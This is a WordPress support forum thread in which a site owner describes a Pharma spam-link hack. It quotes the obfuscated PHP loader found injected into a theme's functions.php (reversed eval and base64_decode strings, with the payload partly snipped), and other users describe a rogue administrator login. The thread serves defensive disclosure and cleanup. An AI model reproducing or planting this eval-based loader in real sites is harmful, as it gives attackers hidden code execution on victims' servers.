edoced_46esab malware in theme directory

  • Hi all,

    After upgrading to WordPress 4.x we started to notice malware inserting links about ‘clomid side effects’ into certain pages. These links were not always easy to read but were beginning to show up in Google searches for our site, so we assumed an SEO attack. Searching for the cause led us to descriptions of the Pharma hack, but the WordPress database did not contain any of the tell-tale entries for that hack.

    However the tip on Pharma fix pages that malware writers reverse base64_decode to become edoced_46esab lead us to find a rogue version of the file functions.php in our custom theme, with a date stamp of Jan 7 05:25 (i.e. just over a week ago).

    The file had been modified to insert at the beginning:

    <?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave'));$wp_function_initialize(strrev(';))"=oQD9pQD7kiIwhGc

<snip>

pR3YuVnZoYWa"(edoced_46esab(lave'));?>

    We have now removed this file and the effect of the hack is gone for now. We have also changed site passwords. I hope this information is useful for others with the same problem.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Moderator James Huff

    (@macmanx)

    Thanks for sharing that!

    To anyone else stopping by here, also make sure that you carefully follow this guide.

    When you’re done, you may want to implement some (if not all) of the recommended security measures.

    I also found a problem with a hack on 2 of my clients’ sites on Feb 18 just before the 4.1.1 maintenance upgrade. After cleaning up suspicious files and upgrading WordPress to 4.1.1 After that I installed WordFence Security.

    Something triggered an attack again today.

    Today, WordFence security on one of those sites generated a successful logon alert by a (nonexistent) administrator “systemwpadmin”.

    The database did record the login of this user but not a logoff.

    The file manager contained a number of problem files in addition to those noted by the WordFence scan.

    The protocol that James refers to contains all of the steps that I took to clean this up. I also like the article on Hardening WordPress so will be looking at that carefully.

    Hope this will be helpful to someone else.

    Oh my goodness! After proverbially pulling my hair out for the past couple of days, I came across your post. I followed it to the word et voila! Nasty pharmahack gone!

    An eternity of thanks to you, sir, for your help.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘edoced_46esab malware in theme directory’ is closed to new replies.